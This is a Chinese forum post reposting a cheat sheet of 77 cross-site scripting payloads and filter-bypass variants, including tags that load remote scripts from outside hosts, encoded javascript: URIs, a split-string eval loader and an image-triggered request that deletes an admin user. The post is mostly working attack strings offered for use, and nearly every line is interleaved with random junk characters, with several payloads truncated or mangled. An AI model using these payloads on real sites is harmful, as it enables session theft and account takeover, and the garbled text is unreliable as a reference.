貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
3 h2 V9 N/ B8 V3 _- e4 R' y- H# }: L
(1)普通的XSS JavaScript注入& z! C3 O7 }9 y7 j: _ y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- u1 g. _" v; | k+ U% T
( L- k3 x9 C5 ?- i* Y1 } (2)IMG标签XSS使用JavaScript命令
5 _$ V( r* C1 n; E- y <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! Y4 v- g0 u% M4 f$ f, x. D
& T: x/ f2 P2 S9 l/ a! W (3)IMG标签无分号无引号
4 r% y5 }- R) @. a- A ] <IMG SRC=javascript:alert(‘XSS’)>6 ^, w3 ]" w9 y H9 x5 q6 ]* e
e @1 f6 A' G% R" P/ Q( K
(4)IMG标签大小写不敏感
, g; P% A# O, w/ x9 A <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" ?( d5 q5 G" @* S! F( \, }" i, G0 u0 ]2 i2 k( ^* _6 H# L
(5)HTML编码(必须有分号), b1 d# C9 O; c' Z
<IMG SRC=javascript:alert(“XSS”)>
6 p, V! e8 X3 M" a& m, T1 A% T6 k! s/ f0 d3 ^8 K! w6 D/ G5 r! |* U
(6)修正缺陷IMG标签7 E% h A' X- j+ Q/ k3 W
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! c6 Y3 b- N) J/ V/ s
. `: z4 b, m! J0 ^7 O4 n (7)formCharCode标签(计算器)$ ]% E- t- n7 v' O% W# Z1 }
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 O2 k" n- o1 R* n" a5 u
' I. Z1 u; C6 J) T# e, p1 P1 N8 @ (8)UTF-8的Unicode编码(计算器)- W6 M2 [! n1 J5 T
<IMG SRC=jav..省略..S')>
) O3 A: _/ Y, K1 v/ K+ P4 J! k% T
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
! E; u; M. V2 N& Y7 M1 S4 R <IMG SRC=jav..省略..S')>/ v4 B9 N/ w% U0 r8 k, H! h
$ r# ^; x8 j7 Y, |! W$ d (10)十六进制编码也是没有分号(计算器)
( K' L6 L% q# ] <IMG SRC=java..省略..XSS')>4 `0 M. i* ~. y, g/ T
8 G. ]% Z3 D+ C5 p( k9 T (11)嵌入式标签,将Javascript分开 x7 M+ f$ z+ J/ Z* @ ]. b
<IMG SRC=”jav ascript:alert(‘XSS’);”>( `$ w8 _ I9 }. P
! ~; u6 C+ b& u, i( Z w, H (12)嵌入式编码标签,将Javascript分开4 E- w( {' y. j
<IMG SRC=”jav ascript:alert(‘XSS’);”>
. w4 E# Y& y5 \8 ?% a
' P+ U& ~ }2 o8 z6 {5 C (13)嵌入式换行符
2 ^1 E7 e" j9 _0 r3 B <IMG SRC=”jav ascript:alert(‘XSS’);”>
/ `) l: Q1 e. O" t, x
, b" C9 n' H" ~ (14)嵌入式回车
0 t1 [; s* x6 F$ N& I. X9 } <IMG SRC=”jav ascript:alert(‘XSS’);”># d4 c: u2 w: ^8 o
3 W+ k: n( O" C
(15)嵌入式多行注入JavaScript,这是XSS极端的例子0 \8 E3 t7 ]! g0 _$ w. T0 A
<IMG SRC=”javascript:alert(‘XSS‘)”>
7 }1 Z3 f+ v0 G' |' U( u- Y
" S: S& w/ I( z* s4 L n9 p8 E5 ` (16)解决限制字符(要求同页面)
' j! V" X' {' N <script>z=’document.’</script>1 z: O1 m' f* p! A* N( O- F
<script>z=z+’write(“‘</script>% u# ~% \) ]& s% s& y
<script>z=z+’<script’</script>2 G3 o: {0 i, h, j8 ]' M; z
<script>z=z+’ src=ht’</script>* P' Z. T$ B E- |
<script>z=z+’tp://ww’</script>
6 V+ A: G" d" |. a; B <script>z=z+’w.shell’</script>4 ?- h0 Z+ V5 @+ R) X
<script>z=z+’.net/1.’</script>
' _8 B# e6 }# Y0 k7 f( y <script>z=z+’js></sc’</script>
9 e+ S: @; Z/ c& W' G a& U- l7 [9 a <script>z=z+’ript>”)’</script>; b9 ?5 f7 O% J$ X- |) A; Y+ N% }
<script>eval_r(z)</script>- T5 G8 Y5 b" H' X8 t% ^8 M, ^
' g: p- x# I1 C8 I8 d( y; o (17)空字符
% t, e& u, G r* i perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
4 _# y5 M( K& E# P9 G0 W& P5 F: [/ a! i
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用# G+ R( u3 j0 j" W! h. o- f
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out- Q' {- v6 c2 K0 }' t
, ~ k& v* y o8 P
(19)Spaces和meta前的IMG标签+ P1 w# | T+ ~0 l8 k! G: I+ F& o" m b
<IMG SRC=” � javascript:alert(‘XSS’);”>
4 I5 o5 w7 U+ A5 I% }6 K. N
5 i1 w8 h2 S( U+ D8 P1 K! c% U (20)Non-alpha-non-digit XSS: T8 G3 y5 B0 x. b; A) v5 \
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ S* }4 `% s% v$ |2 r$ l( S3 B. s- r9 ~0 Z2 S! _ C
(21)Non-alpha-non-digit XSS to 2
. ~4 i# w) P! K, @8 p5 d; O <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
R: {" P; x, {% H! I+ v9 F
# w3 b, b- R; i (22)Non-alpha-non-digit XSS to 3
% \% w7 M* N! H" n7 e <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% m: p5 N1 ?, ^! Z* ~. k* ` z2 j4 Y. w$ ?) w9 U5 b& v
(23)双开括号
4 t1 j {5 y* l; J <<SCRIPT>alert(“XSS”);//<</SCRIPT>- m* F3 u0 R" ^# W6 F, z
% Q' v0 q2 L( ~% H6 j (24)无结束脚本标记(仅火狐等浏览器)/ g' V7 h7 _8 [) s
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ v- I) w5 y' R7 [
: [4 O1 T3 z( Q* b# _1 } (25)无结束脚本标记2
/ V8 M$ A+ h2 p) d% @ <SCRIPT SRC=//3w.org/XSS/xss.js>
! o$ \& E4 I/ u0 A8 Y- G M
) I% A, b {8 L (26)半开的HTML/JavaScript XSS
2 J8 V" k6 R$ K <IMG SRC=”javascript:alert(‘XSS’)”
" T7 ~6 H% e& F1 @" M$ X& m4 Z' _6 ?0 h1 }+ F/ E; f
(27)双开角括号8 f$ D" e- q5 T3 |. Q
<iframe src=http://3w.org/XSS.html <& ]" d, ~/ ?) D- t1 w" A
3 ^8 P8 Q/ v' e* \4 K& ]$ U2 Z
(28)无单引号 双引号 分号( v; |9 y4 @5 v- v: A
<SCRIPT>a=/XSS/
5 t) e5 f+ D: j alert(a.source)</SCRIPT>3 n" R1 F! o1 [. ~' R# n+ C$ t
8 \3 S- o! ~4 n/ l' s
(29)换码过滤的JavaScript( J" l9 m1 i: l: G/ F1 J. `
\”;alert(‘XSS’);//! s/ Z# F, N8 J( S' O/ w
+ c% u- Y( v+ ~& P$ Z2 {# r( q (30)结束Title标签
8 I# M0 [4 \5 E6 H/ c9 _ </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 a/ f, c) k; h! Y1 R2 `! }7 I+ _
) i# ?# M% |# R; `) _/ m2 U (31)Input Image- _* c2 w5 S- o
<INPUT SRC=”javascript:alert(‘XSS’);”>. ~' ~& y4 J' u. [) Z! K1 W
8 S9 O' T: r- A6 O* |. b1 H
(32)BODY Image
: n% s) E% d8 C- e; L9 y2 N2 x7 O <BODY BACKGROUND=”javascript:alert(‘XSS’)”>" Y! R# t; I- K6 {8 V
- t4 J0 F, r+ L
(33)BODY标签
* O4 O, v7 Y! Y# y0 z" a0 e <BODY(‘XSS’)>' S) a9 S, S* F: K
: e) ?5 d# Q2 a$ Q8 w$ _& e$ a (34)IMG Dynsrc
- ]. Z2 f3 ^$ J <IMG DYNSRC=”javascript:alert(‘XSS’)”>) ?) l7 V5 p- Z0 G) k8 H
7 p, m7 N' u4 T- k' n% o' V
(35)IMG Lowsrc: Y e# J4 }$ A) L* @* Q
<IMG LOWSRC=”javascript:alert(‘XSS’)”>! O* _/ F% E+ V0 b6 ^5 M
$ O& z3 d" ~8 n/ f" N
(36)BGSOUND) `, k6 m: z( M
<BGSOUND SRC=”javascript:alert(‘XSS’);”>& v. {* D0 T5 y* ~
( M" B% B S+ n5 e, d
(37)STYLE sheet
( }, q, J4 ~6 ^! w! G* B, ? <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& g3 E0 j o) ~! d0 {' F7 e, q2 f1 F z! ~. M1 v6 a6 ?
(38)远程样式表
. M+ i) f% Y# C" r5 C <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
+ k" e$ ^5 F! J0 v2 P8 l/ O
( A+ R1 L s+ j& h) V+ q (39)List-style-image(列表式)
+ [: H' O' Z; K6 t) ]1 D <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS% d' D: I# o5 k1 @/ s- b/ g1 T; g
5 \5 K. b" N$ c
(40)IMG VBscript
/ F2 ]8 r+ i0 r! ^& K <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
: ~" U! i9 `8 g" U1 \9 v! a0 i0 j: }, d7 k3 Q5 k
(41)META链接url
- A6 X. D, o9 ]; x0 u7 }8 ]# R <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
7 ~' ?- c/ R6 d `
( W2 s1 `9 n# Z7 q* x (42)Iframe: Y/ _) [0 l; U( i: \
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
9 r9 }- E; x* [1 T. S! X4 X' w3 ~( P7 @
(43)Frame
% _( _. K5 A+ Q2 s4 {8 h <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>; w$ H# v6 m ?7 y- t( ~2 H N
' J( f$ y6 E, H5 G (44)Table+ J! r _0 n1 ~. d1 U
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 U3 p' c/ E1 O' w+ \
, ] A4 N$ u& M7 {2 `1 e (45)TD
* Z: `7 S4 S7 t- b" u <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>" h# O- n- O" |0 a' p9 s
+ N. k& W6 W4 K! Y' e+ m& {
(46)DIV background-image! c" |% x9 T9 n
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& m, |6 ^! e9 Q2 B7 X( R+ s! j6 m1 F& a
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
* c0 E2 }% [( T) J+ S' ~. O <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
4 |. Y% U: `$ c
2 y- v4 I! i3 ]$ g& v (48)DIV expression
- }5 g- O8 X( [1 F4 e <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
3 k1 ?4 ~5 |0 z. n0 O" G3 X$ j
1 a$ H; d2 q! f8 H (49)STYLE属性分拆表达
) V5 J0 I( B" T9 x- R, t/ m <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 I$ ~) K! {% l& I7 ?) V
5 a2 N' X4 V6 P# `7 t8 ?) g (50)匿名STYLE(组成:开角号和一个字母开头)5 z) T; {- g2 k0 T8 p8 C0 v7 o
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>! G" A: K0 M! E. a
- B, |0 o& R7 j: _" Y (51)STYLE background-image
: M! _2 b- g4 I" U N <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A> V& i9 A0 Z- O6 c8 M( K* I
6 k5 d/ a& X' \6 Y0 w
(52)IMG STYLE方式6 r0 m. u1 R" ]- s; F& @
exppression(alert(“XSS”))’>3 F% W# L* R/ v3 [
; I) }0 t7 C6 g! I: V
(53)STYLE background
+ g% c8 r& S$ E5 e. L <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
`; P3 d9 W! ?
( r! @4 i7 ]7 M1 c( f% H (54)BASE
- T% P/ y+ U9 e <BASE HREF=”javascript:alert(‘XSS’);//”>
0 M5 e' R/ y, i+ z$ |! D; U- I" k) f% S2 v
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! V- l/ m: R: \- q9 `' b <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
- q. l }6 D6 r M' @7 A, _5 f
4 _* Y) k( r5 E- c, r( T (56)在flash中使用ActionScrpt可以混进你XSS的代码
( m# V0 o7 r, s% B3 } a=”get”;( ~, B0 o% p/ H8 ?/ G; t( h
b=”URL(\”";
C7 O$ J6 R$ G! q5 U c=”javascript:”;, O0 `, O7 J$ m; H; c6 R5 v3 ?
d=”alert(‘XSS’);\”)”;6 v/ f4 D. W( w9 Q: ?4 T) n5 b
eval_r(a+b+c+d);) v9 v/ ^+ [4 Q1 G& R/ H d
! S; A; `) [+ j x8 U. w0 }: t: d l5 C (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
+ H3 H' S+ s( k, }1 | <HTML xmlns:xss>$ p' ? ?$ c) \
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>4 {" I9 f1 y$ T9 k- a. L
<xss:xss>XSS</xss:xss>
3 F7 l! t; z4 @7 y @' U. b </HTML>3 d0 f7 s: n/ f3 J1 F
1 Q8 G! J" S( a4 }( F
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用+ K/ Q4 R( s2 H9 ^+ U( T- B
<SCRIPT SRC=””></SCRIPT>$ n( s* B4 f( U6 e
" k1 G7 V7 w) U1 M% f
(59)IMG嵌入式命令,可执行任意命令 [. n0 b# J; a' V9 \# T) f
<IMG SRC=”http://www.XXX.com/a.php?a=b”>2 ~7 I8 O, ~/ Z# n/ L
/ m+ O/ e4 ]/ Q, }) o8 H; x* U
(60)IMG嵌入式命令(a.jpg在同服务器)
6 j1 |' V7 |& V4 h; G Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( U; W, M$ s* g- J
1 }/ U0 M+ V2 r (61)绕符号过滤
. S- M' q: b4 C' V" b <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 m3 K0 w4 [! I% u$ [& Y* p4 S: R
(62)
9 A T6 y* o# S1 e% g/ H6 e# g <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 I& X _; [" X* z! R8 ?
# {; h9 i6 @* I' b
(63)
+ n6 j* F( e7 n" ?8 c; i; q1 h <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>& V+ b {: m/ ~. p( ~8 D
( t$ Q W: Y* @& I9 H' K0 f4 W9 S
(64)" Q6 g) _" a6 r: x
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>, g' \/ r/ z5 ?2 [! O6 ?9 A
1 e2 H/ C$ Z3 F ?* y. F
(65)
% X/ Y$ b# W& N <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
1 e, S5 I5 K# U' H. x' E- _* b
- [% D, e3 t6 }0 t) u4 b4 ` (66)
8 x6 Q$ B* E8 n7 }/ u& v. {; Q <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>/ d; _& |4 u7 U
; Q' g/ W9 _6 y* q4 B) `3 |0 B F
(67)
* Z: j4 P' D& B: I( U1 x; X m1 n) V <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>& l( \" Y4 t [
: q- m4 i% C C& R# l
(68)URL绕行
6 I7 D' {8 C5 F' G3 w! v% O( i <A HREF=”http://127.0.0.1/”>XSS</A>! |6 ?# P2 H% ~3 R0 G& U
: u+ f" d$ T. z# ~ (69)URL编码
0 Y8 r- T. y8 W) M$ b <A HREF=”http://3w.org”>XSS</A>
6 O+ j9 n2 k" h* o+ {) x% z+ F& g. J& ^* a
(70)IP十进制9 L1 }+ G. B/ M6 }5 J' X2 u9 N! |
<A HREF=”http://3232235521″>XSS</A>9 t% }, S" O8 d( H8 N* X9 h
6 C# f- R& S! g
(71)IP十六进制
( D9 F% D" Z% i3 ? <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
& N) u+ J1 E$ Z- K* V4 }9 A, H% x' V
(72)IP八进制: P1 P8 y( `, b& S$ e- Y
<A HREF=”http://0300.0250.0000.0001″>XSS</A>0 g* I( R: g, ~
7 ^* f: t }% Y( L! J6 W
(73)混合编码
0 {& H( b9 Z' C' F: `! {" Z <A HREF=”h% E& [, S0 I0 C2 ]
tt p://6 6.000146.0×7.147/”">XSS</A>
8 E8 P$ ]: s: @, G9 m
: V; c3 G$ e, Y" x% q' Y (74)节省[http:]3 Q4 l( @/ o& I2 W2 ~) n0 K
<A HREF=”//www.google.com/”>XSS</A>0 i# J9 y1 [9 ^1 ]4 E0 p
" D, r+ G8 D& W' h (75)节省[www]
# x2 v9 S! I- I2 h* g+ ^* p9 w <A HREF=”http://google.com/”>XSS</A>0 O( z+ J" Q2 y& E7 I/ `: `5 \
8 @/ T* U0 S- D) g4 X/ I# d2 r (76)绝对点绝对DNS$ t. R# b0 o6 E$ G
<A HREF=”http://www.google.com./”>XSS</A>. U: A! d8 @; |- ~; K" ]
, M* Y6 l: ~; M (77)javascript链接4 R6 j0 ?: d9 |' r |; X
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对